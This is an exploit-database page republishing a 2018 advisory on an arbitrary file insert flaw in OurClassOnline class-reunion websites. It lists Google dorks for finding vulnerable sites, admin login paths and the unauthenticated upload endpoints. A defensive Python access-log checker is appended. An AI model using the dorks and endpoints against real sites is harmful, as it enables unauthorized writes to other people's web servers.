CVE | Category | Price | Severity |
---|---|---|---|
 | CWE-264 | $500 | High |
Author | Risk | Exploitation Type | Date |
---|---|---|---|
Unknown | High | Remote | 2018-11-13 |
CVSS | EPSS | EPSSP |
---|---|---|
CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H | 0.02192 | 0.50148 |
#################################################################################################
# Exploit Title : Web Portal People LLC 2018 OurClassOnline USA Unauthorized Arbitrary File Insert Vulnerability
# Author [ Discovered By ] : KingSkrupellos from Cyberizm Digital Security Army
# Date : 13/11/2018
# Vendor Homepage : webportalpeople.com ~ ourclassonline.com
# Tested On : Windows and Linux
# Category : WebApps
# Google Dorks : intext:''To obtain a site like this for your class visit www.ourclassonline.com.''
intext:''Copyright Web Portal People, LLC. 2018 - Maker of class reunion & family websites. All rights reserved.''
# Exploit Risk : Medium
# CWE : CWE-264 - [ Permissions, Privileges, and Access Controls ]
#################################################################################################
# Admin and Moderator Panel Login Paths :
/admin/index.php
/login_form.php?action=reunion
/login_form.php?action=news
/login_form.php?action=classmates
/login_form.php?action=gallery&galleryid=6
/login_form.php?action=gallery&galleryid=2
/login_form.php?action=gallery&galleryid=3
/login_form.php?action=year_review
/login_form.php?action=gallery&galleryid=4
#################################################################################################
# Exploit :
/forum_topic_create.php?forumid=1
/files_forum/[RANDOM-NUMBER]_[YOUR-FILENAME-HERE].txt
/calendar_add.php
/calendar_event.php?eventid=[RANDOM-NUMBER]
#################################################################################################
# Example Vulnerable Sites
#################################################################################################
# Discovered By KingSkrupellos from Cyberizm.Org Digital Security Team
#################################################################################################
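A log check a site operator could run against the paths named in the advisory, added here as an example and not part of the original advisory: it flags POSTs to the two write endpoints from clients with no earlier login request, and later fetches under /files_forum/ by those clients. The combined access-log format, the sample lines, the function name `find_suspicious`, and the heuristic that a login POST precedes legitimate writes are assumptions.

```python
import re
from urllib.parse import urlsplit

# Paths taken from the advisory.
WRITE_PATHS = {"/forum_topic_create.php", "/calendar_add.php"}
LOGIN_PATHS = {"/login_form.php", "/admin/index.php"}
UPLOAD_RE = re.compile(r"^/files_forum/\d+_[^/]+$")  # /files_forum/[RANDOM-NUMBER]_[NAME]

# Assumption: Apache/nginx "combined" access-log format.
LINE_RE = re.compile(r'^(\S+) \S+ \S+ \[[^\]]+\] "(\S+) (\S+) [^"]*" (\d{3}) ')

def find_suspicious(lines):
    """Return findings as (client_ip, kind, path) tuples, in log order."""
    logged_in, posted, findings = set(), set(), []
    for line in lines:
        m = LINE_RE.match(line)
        if not m:
            continue  # skip malformed lines
        ip, method, target, status = m.groups()
        path = urlsplit(target).path
        # Heuristic (assumption): a 2xx/3xx POST to a login path marks a signed-in client.
        if path in LOGIN_PATHS and method == "POST" and status.startswith(("2", "3")):
            logged_in.add(ip)
        elif path in WRITE_PATHS and method == "POST" and ip not in logged_in:
            posted.add(ip)
            findings.append((ip, "write-without-login", path))
        elif UPLOAD_RE.match(path) and ip in posted:
            findings.append((ip, "fetch-after-write", path))
    return findings

# Constructed sample log (documentation IP ranges, not real traffic).
SAMPLE = [
    '198.51.100.7 - - [13/Nov/2018:10:00:01 +0000] "POST /login_form.php?action=news HTTP/1.1" 302 0 "-" "Mozilla/5.0"',
    '198.51.100.7 - - [13/Nov/2018:10:00:09 +0000] "POST /forum_topic_create.php?forumid=1 HTTP/1.1" 200 512 "-" "Mozilla/5.0"',
    '203.0.113.9 - - [13/Nov/2018:10:02:14 +0000] "POST /forum_topic_create.php?forumid=1 HTTP/1.1" 200 512 "-" "curl/7.61"',
    '203.0.113.9 - - [13/Nov/2018:10:02:20 +0000] "GET /files_forum/48213_notes.txt HTTP/1.1" 200 64 "-" "curl/7.61"',
    '198.51.100.7 - - [13/Nov/2018:10:03:00 +0000] "GET /files_forum/48213_notes.txt HTTP/1.1" 200 64 "-" "Mozilla/5.0"',
    '203.0.113.9 - - [13/Nov/2018:10:04:41 +0000] "POST /calendar_add.php HTTP/1.1" 200 128 "-" "curl/7.61"',
]

if __name__ == "__main__":
    for finding in find_suspicious(SAMPLE):
        print(finding)
```

Findings are leads for review, not proof: clients behind a shared address or with sessions that began before the log window will be misclassified.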
Copyright ©2024 Exploitalert.